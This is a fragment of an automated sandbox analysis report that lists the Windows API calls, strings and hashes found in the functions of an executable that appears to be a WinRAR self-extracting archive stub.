                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                    • String ID: %s%s%u
                                    • API String ID: 2892007947-1360425832
                                    • Opcode ID: 77f433deaf3c0b2685f7d8fc12234a5d6a5f1d95e62c69b3713baaa1e3645f90
                                    • Instruction ID: 567f5dc9a5579f3f2f6148d1a3f9abe4d8f57d42b6145d0d1a16104bb82cb183
                                    • Opcode Fuzzy Hash: 77f433deaf3c0b2685f7d8fc12234a5d6a5f1d95e62c69b3713baaa1e3645f90
                                    • Instruction Fuzzy Hash: E6417471910718AEEF27DBA0DC45FEA77BCAB08306F0450A6E909DB061E7719BC8CB50
                                    APIs
                                    • ShowWindow.USER32(?,00000000), ref: 0035964E
                                    • GetWindowRect.USER32(?,00000000), ref: 00359693
                                    • ShowWindow.USER32(?,00000005,00000000), ref: 0035972A
                                    • SetWindowTextW.USER32(?,00000000), ref: 00359732
                                    • ShowWindow.USER32(00000000,00000005), ref: 00359748
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Window$Show$RectText
                                    • String ID: RarHtmlClassName
                                    APIs
                                      • Part of subcall function 0036BF79: _free.LIBCMT ref: 0036BFA2
                                    • _free.LIBCMT ref: 0036C003
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 0036C00E
                                    • _free.LIBCMT ref: 0036C019
                                    • _free.LIBCMT ref: 0036C06D
                                    • _free.LIBCMT ref: 0036C078
                                    • _free.LIBCMT ref: 0036C083
                                    • _free.LIBCMT ref: 0036C08E
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    APIs
                                    • GetLastError.KERNEL32(?,?,003620C1,0035FB12), ref: 003620D8
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003620E6
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003620FF
                                    • SetLastError.KERNEL32(00000000,?,003620C1,0035FB12), ref: 00362151
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    APIs
                                    • GetLastError.KERNEL32(?,00380EE8,00000200,0036895F,003658FE,?,?,?,?,0034D25E,?,034414B0,00000063,00000004,0034CFE0,?), ref: 0036902E
                                    • _free.LIBCMT ref: 00369063
                                    • _free.LIBCMT ref: 0036908A
                                    • SetLastError.KERNEL32(00000000,00373958,00000050,00380EE8), ref: 00369097
                                    • SetLastError.KERNEL32(00000000,00373958,00000050,00380EE8), ref: 003690A0
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID: X7
                                    Similarity
                                    • API ID:
                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                    APIs
                                    • _free.LIBCMT ref: 0036807E
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 00368090
                                    • _free.LIBCMT ref: 003680A3
                                    • _free.LIBCMT ref: 003680B4
                                    • _free.LIBCMT ref: 003680C5
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID: 7
                                    APIs
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350D0D
                                      • Part of subcall function 0034ACF5: GetVersionExW.KERNEL32(?), ref: 0034AD1A
                                    • LocalFileTimeToFileTime.KERNEL32(?,00350CB8), ref: 00350D31
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00350D47
                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00350D56
                                    • SystemTimeToFileTime.KERNEL32(?,00350CB8), ref: 00350D64
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350D72
                                    Similarity
                                    • API ID: Time$File$System$Local$SpecificVersion
                                    • String ID:
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0035D2F2
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035D30C
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035D31D
                                    • TranslateMessage.USER32(?), ref: 0035D327
                                    • DispatchMessageW.USER32(?), ref: 0035D331
                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0035D33C
                                    Similarity
                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                    • String ID:
                                    APIs
                                    • _wcschr.LIBVCRUNTIME ref: 0035C435
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    Similarity
                                    • API ID: CompareString_wcschr
                                    • String ID: <$HIDE$MAX$MIN
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035A9DE
                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0035A9F6
                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0035AA24
                                    Similarity
                                    • API ID: ItemText$DialogWindow
                                    • String ID: GETPASSWORD1$xj9
                                    APIs
                                    • LoadBitmapW.USER32(00000065), ref: 0035ADFD
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0035AE22
                                    • DeleteObject.GDI32(00000000), ref: 0035AE54
                                    • DeleteObject.GDI32(00000000), ref: 0035AE77
                                      • Part of subcall function 00359E1C: FindResourceW.KERNEL32(0035AE4D,PNG,?,?,?,0035AE4D,00000066), ref: 00359E2E
                                      • Part of subcall function 00359E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0035AE4D,00000066), ref: 00359E46
                                      • Part of subcall function 00359E1C: LoadResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E59
                                      • Part of subcall function 00359E1C: LockResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E64
                                    Similarity
                                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                    • String ID: ]
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035CCDB
                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0035CCF1
                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0035CD05
                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0035CD14
                                    Similarity
                                    • API ID: ItemText$DialogWindow
                                    • String ID: RENAMEDLG
                                    • API String ID: 445417207-3299779563
                                    • Opcode ID: 9bd09188a7084277db998910f288ae458ca8663e810edaf358e0b88aa9457b38
                                    • Instruction ID: 678c10101c6d389f5d5eb19f32a525e28147d2edb796189322ed8ee3da1d62a6
                                    • Opcode Fuzzy Hash: 9bd09188a7084277db998910f288ae458ca8663e810edaf358e0b88aa9457b38
                                    • Instruction Fuzzy Hash: 630128322943507EE1238F689C08F573BACEB5A707F110411F785A60F0C7A6690A8B65
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0036251A
                                      • Part of subcall function 00362B52: ___AdjustPointer.LIBCMT ref: 00362B9C
                                    • _UnwindNestedFrames.LIBCMT ref: 00362531
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00362543
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00362567
                                    Strings
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID: /)6
                                    • API String ID: 2633735394-1202508477
                                    • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                    • Instruction ID: f34dad964619d3f1eb14fcc159e4e37022891e343a2b373c80d4fa1a1d180066
                                    • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                    • Instruction Fuzzy Hash: 9D010532000508ABCF239F65CC01E9B7BAAEF59710F168014FE1966124C336E961ABA1
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00367573,00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002), ref: 003675E2
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003675F5
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00367573,00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002), ref: 00367618
                                    Strings
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 2751de733323e1bb3365425cfa90f5aa8ec7eeb9dd2025ed4104ae820eac9bd5
                                    • Instruction ID: 7a1cc3fe2205fdf24ef6d25ecef6b8bc01548e6c41c454139804a148e60c0e95
                                    • Opcode Fuzzy Hash: 2751de733323e1bb3365425cfa90f5aa8ec7eeb9dd2025ed4104ae820eac9bd5
                                    • Instruction Fuzzy Hash: 4BF0A430A04618FBCB279F54DC09BDDBFB8EF04715F404068F809A6150DB708A80DA54
                                    APIs
                                      • Part of subcall function 00350085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                      • Part of subcall function 00350085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0034EB92
                                    • GetProcAddress.KERNEL32(003881C0,CryptUnprotectMemory), ref: 0034EBA2
                                    Strings
                                    Similarity
                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                    • API String ID: 2141747552-1753850145
                                    • Opcode ID: 9649c11f5fdd004a53f6998bd5b4bc4b80e70aec0507735379a8bd35e9f11d1c
                                    • Instruction ID: 2bd51099139254ff0691be77364466fc673513cf10a6d4e14922729d97553f97
                                    • Opcode Fuzzy Hash: 9649c11f5fdd004a53f6998bd5b4bc4b80e70aec0507735379a8bd35e9f11d1c
                                    • Instruction Fuzzy Hash: B2E04F704047519ECB339F349848B82BEE4EF15701F00C81DE5DAD7190D7B9D584AB50
                                    APIs
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 7ed75ebdef615a8db9f51a5889b1ffa173b62844390d628f29b3a9cbc28b559b
                                    • Instruction ID: 18232cc59071edb75f554005b772f9cfa2cd82a79ee5a366b3ef43d1ad8a0e13
                                    • Opcode Fuzzy Hash: 7ed75ebdef615a8db9f51a5889b1ffa173b62844390d628f29b3a9cbc28b559b
                                    • Instruction Fuzzy Hash: 5E41F732A003049FCB25DF78C881A5EB7A5EF89718F5685A8E515EF345DB31ED05CB80
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0036B619
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036B63C
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036B662
                                    • _free.LIBCMT ref: 0036B675
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036B684
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 65a8b33793e0e1bcdf3a3cb8437fea55ba078a2c438e07c1ad8501ba3a392fb8
                                    • Instruction ID: f2e4f1f778102517813be4bc9132e9baca8ab78136ba7c6cbc13c500a97e8008
                                    • Opcode Fuzzy Hash: 65a8b33793e0e1bcdf3a3cb8437fea55ba078a2c438e07c1ad8501ba3a392fb8
                                    • Instruction Fuzzy Hash: 0A01A772601215BFA3331676AC8CC7BAA6DDEC7BA03168239FD05C7119DF60CD8199B1
                                    APIs
                                      • Part of subcall function 00350A41: ResetEvent.KERNEL32(?), ref: 00350A53
                                      • Part of subcall function 00350A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00350A67
                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0035078F
                                    • CloseHandle.KERNEL32(?,?), ref: 003507A9
                                    • DeleteCriticalSection.KERNEL32(?), ref: 003507C2
                                    • CloseHandle.KERNEL32(?), ref: 003507CE
                                    • CloseHandle.KERNEL32(?), ref: 003507DA
                                      • Part of subcall function 0035084E: WaitForSingleObject.KERNEL32(?,000000FF,00350A78,?), ref: 00350854
                                      • Part of subcall function 0035084E: GetLastError.KERNEL32(?), ref: 00350860
                                    Similarity
                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                    • String ID:
                                    • API String ID: 1868215902-0
                                    • Opcode ID: 7cd81a4ab8fadf40ec9b6651dc569c7816e3e2d58372c4ff5e59ee0fd6833363
                                    • Instruction ID: c9e6e10a563422ac1ad236a32e7f4941d91212d1b5e6aad11e416cce35fcaf5b
                                    • Opcode Fuzzy Hash: 7cd81a4ab8fadf40ec9b6651dc569c7816e3e2d58372c4ff5e59ee0fd6833363
                                    • Instruction Fuzzy Hash: 30018072440704EBC7339B69DC84F86BBADFB49711F004519F55F52160CB766A889B91
                                    APIs
                                    • _free.LIBCMT ref: 0036BF28
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 0036BF3A
                                    • _free.LIBCMT ref: 0036BF4C
                                    • _free.LIBCMT ref: 0036BF5E
                                    • _free.LIBCMT ref: 0036BF70
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: c15969acfadbf6843d454f5780fef0aed2c3a1ed576deb6c7e675b7e6188c086
                                    • Instruction ID: efab75f32a9e665434343c3d44a3a629b646d26b206052bb3f5d6971eb96c47b
                                    • Opcode Fuzzy Hash: c15969acfadbf6843d454f5780fef0aed2c3a1ed576deb6c7e675b7e6188c086
                                    • Instruction Fuzzy Hash: 35F0EC32508201ABC633EB65EECAC16F3DDBA08714B66C945F048DB929CF20FCC08E64
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00347579
                                      • Part of subcall function 00343B3D: __EH_prolog.LIBCMT ref: 00343B42
                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00347640
                                      • Part of subcall function 00347BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347C04
                                      • Part of subcall function 00347BF5: GetLastError.KERNEL32 ref: 00347C4A
                                      • Part of subcall function 00347BF5: CloseHandle.KERNEL32(?), ref: 00347C59
                                    Strings
                                    Similarity
                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                    • API String ID: 3813983858-639343689
                                    • Opcode ID: ff42bb7302c725605e596dd06b1708eb065ff73caa72e331550b88a3929afb87
                                    • Instruction ID: 7b64c89510b100cda96e031645d65c6770b9315eec0d026f002d552c684014f4
                                    • Opcode Fuzzy Hash: ff42bb7302c725605e596dd06b1708eb065ff73caa72e331550b88a3929afb87
                                    • Instruction Fuzzy Hash: 0F31D571908248AEDF23EB68DC01FEE7BF9AF15344F014095F849AF152C7746A48C7A1
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035A4B8
                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0035A4CD
                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0035A4E2
                                    Strings
                                    Similarity
                                    • API ID: ItemText$DialogWindow
                                    • String ID: ASKNEXTVOL
                                    • API String ID: 445417207-3402441367
                                    • Opcode ID: a3b3496c20b191cd40ceb322549a9fbef4110713b5d3a64ac96483e7513f87ec
                                    • Instruction ID: b47ac4450bfbb6840668ab9b2228e2c40202b7830ba2e3b00272b943d1eb7c37
                                    • Opcode Fuzzy Hash: a3b3496c20b191cd40ceb322549a9fbef4110713b5d3a64ac96483e7513f87ec
                                    • Instruction Fuzzy Hash: 8C119672244600BFD6239F999C49F667BADEB4B702F114204FA419F2B0C7A19909E723
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: __fprintf_l_strncpy
                                    • String ID: $%s$@%s
                                    • API String ID: 1857242416-834177443
                                    • Opcode ID: 0ff009b5f87fc8551d69c50605b5cb0faed024f02c8ad0577a59e69e690d9520
                                    • Instruction ID: 7f4427d33762c9eaed572e33d7f80cc61c0be70c2e0db6d8d6fc57964e6f1dca
                                    • Opcode Fuzzy Hash: 0ff009b5f87fc8551d69c50605b5cb0faed024f02c8ad0577a59e69e690d9520
                                    • Instruction Fuzzy Hash: 2C215172540208ABDB22DEA4CC46FDE7BECAF05300F044922FE159E1A5E3B5FA59DB51
                                    APIs
                                    • _swprintf.LIBCMT ref: 0034B51E
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • _wcschr.LIBVCRUNTIME ref: 0034B53C
                                    • _wcschr.LIBVCRUNTIME ref: 0034B54C
                                    Strings
                                    Similarity
                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                    • String ID: %c:\
                                    • API String ID: 525462905-3142399695
                                    • Opcode ID: d237e95e883ac9ee6fb5ae8e8c5081602aeee8732f51eb2f90f66ed2b7ced14f
                                    • Instruction ID: 420c629903c26f85f203b2039557eaf4df8df4b325f884c2db7f866551e78689
                                    • Opcode Fuzzy Hash: d237e95e883ac9ee6fb5ae8e8c5081602aeee8732f51eb2f90f66ed2b7ced14f
                                    • Instruction Fuzzy Hash: 0601D653904311BBC6326B759C82D6BF7ECDE97360B558816F945CE481EB30E950C2A2
                                    APIs
                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0034ABC5,00000008,?,00000000,?,0034CB88,?,00000000), ref: 003506F3
                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0034ABC5,00000008,?,00000000,?,0034CB88,?,00000000), ref: 003506FD
                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0034ABC5,00000008,?,00000000,?,0034CB88,?,00000000), ref: 0035070D
                                    Strings
                                    • Thread pool initialization failed., xrefs: 00350725
                                    Similarity
                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                    • String ID: Thread pool initialization failed.
                                    • API String ID: 3340455307-2182114853
                                    • Opcode ID: 6dfa65cfc0acbb90210bee2a9418682f88c0328f1c33430ba0222f5bf135078d
                                    • Instruction ID: a3b530c5db0b36f4082cf448e92ef349de5d4e00291b73d3438bab493096b737
                                    • Opcode Fuzzy Hash: 6dfa65cfc0acbb90210bee2a9418682f88c0328f1c33430ba0222f5bf135078d
                                    • Instruction Fuzzy Hash: 4811A0B1500709AFC3325F66C884AA7FBECEB99745F11482EF1DA87210D6726984CB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                    • API String ID: 0-56093855
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    APIs
                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,003480B7,?,?,?), ref: 0034A351
                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,003480B7,?,?), ref: 0034A395
                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,003480B7,?,?,?,?,?,?,?,?), ref: 0034A416
                                    • CloseHandle.KERNEL32(?,?,00000000,?,003480B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0034A41D
                                    Similarity
                                    • API ID: File$Create$CloseHandleTime
                                    • String ID:
                                    • API String ID: 2287278272-0
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003689AD,?,00000000,?,00000001,?,?,00000001,003689AD,?), ref: 0036C0E6
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036C16F
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003667E2,?), ref: 0036C181
                                    • __freea.LIBCMT ref: 0036C18A
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00359DBE
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00359DCD
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00359DDB
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00359DE9
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00362016
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0036201B
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00362020
                                      • Part of subcall function 0036310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0036311F
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00362035
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    APIs
                                      • Part of subcall function 00359DF1: GetDC.USER32(00000000), ref: 00359DF5
                                      • Part of subcall function 00359DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00359E00
                                      • Part of subcall function 00359DF1: ReleaseDC.USER32(00000000,00000000), ref: 00359E0B
                                    • GetObjectW.GDI32(?,00000018,?), ref: 00359F8D
                                      • Part of subcall function 0035A1E5: GetDC.USER32(00000000), ref: 0035A1EE
                                      • Part of subcall function 0035A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0035A21D
                                      • Part of subcall function 0035A1E5: ReleaseDC.USER32(00000000,?), ref: 0035A2B5
                                    Similarity
                                    • API ID: ObjectRelease$CapsDevice
                                    • String ID: (
                                    • API String ID: 1061551593-3887548279
                                    Similarity
                                    • API ID: _swprintf
                                    • String ID: %ls$%s: %s
                                    • API String ID: 589789837-2259941744
                                    APIs
                                    • _free.LIBCMT ref: 0036AA84
                                      • Part of subcall function 00368849: IsProcessorFeaturePresent.KERNEL32(00000017,00368838,00000050,00373958,?,0034CFE0,00000004,00380EE8,?,?,00368845,00000000,00000000,00000000,00000000,00000000), ref: 0036884B
                                      • Part of subcall function 00368849: GetCurrentProcess.KERNEL32(C0000417,00373958,00000050,00380EE8), ref: 0036886D
                                      • Part of subcall function 00368849: TerminateProcess.KERNEL32(00000000), ref: 00368874
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                    • String ID: *?$.
                                    • API String ID: 2667617558-3972193922
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00347730
                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003478CC
                                      • Part of subcall function 0034A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A458
                                      • Part of subcall function 0034A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A489
                                    Similarity
                                    • API ID: File$Attributes$H_prologTime
                                    • String ID: :
                                    • API String ID: 1861295151-336475711
                                    Similarity
                                    • API ID:
                                    • String ID: UNC$\\?\
                                    • API String ID: 0-253988292
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003543D8
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: HC7$XC7
                                    • API String ID: 2005118841-1582499484
                                    Similarity
                                    • API ID:
                                    • String ID: Shell.Explorer$about:blank
                                    • API String ID: 0-874089819
                                    APIs
                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010420,0035A990,?,?), ref: 0035D4C5
                                    Similarity
                                    • API ID: DialogParam
                                    • String ID: GETPASSWORD1$xj9
                                    • API String ID: 665744214-104683938
                                    • Opcode ID: 327f2f0239677effbe0cf318566e85b1593ba320e9806ba7ff23e9618971113d
                                    • Instruction ID: 5bd63a94d80815815cf165ece61553b3192eafbe3c89f4272927de24e1090647
                                    • Opcode Fuzzy Hash: 327f2f0239677effbe0cf318566e85b1593ba320e9806ba7ff23e9618971113d
                                    • Instruction Fuzzy Hash: B61138726142486BDB33DE399C02FAB37DCB706312F0580A4FD49AB1A1CBB4AC489760
                                    APIs
                                      • Part of subcall function 0034EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0034EB92
                                      • Part of subcall function 0034EB73: GetProcAddress.KERNEL32(003881C0,CryptUnprotectMemory), ref: 0034EBA2
                                    • GetCurrentProcessId.KERNEL32(?,?,?,0034EBEC), ref: 0034EC84
                                    Strings
                                    • CryptProtectMemory failed, xrefs: 0034EC3B
                                    • CryptUnprotectMemory failed, xrefs: 0034EC7C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AddressProc$CurrentProcess
                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                    • API String ID: 2190909847-396321323
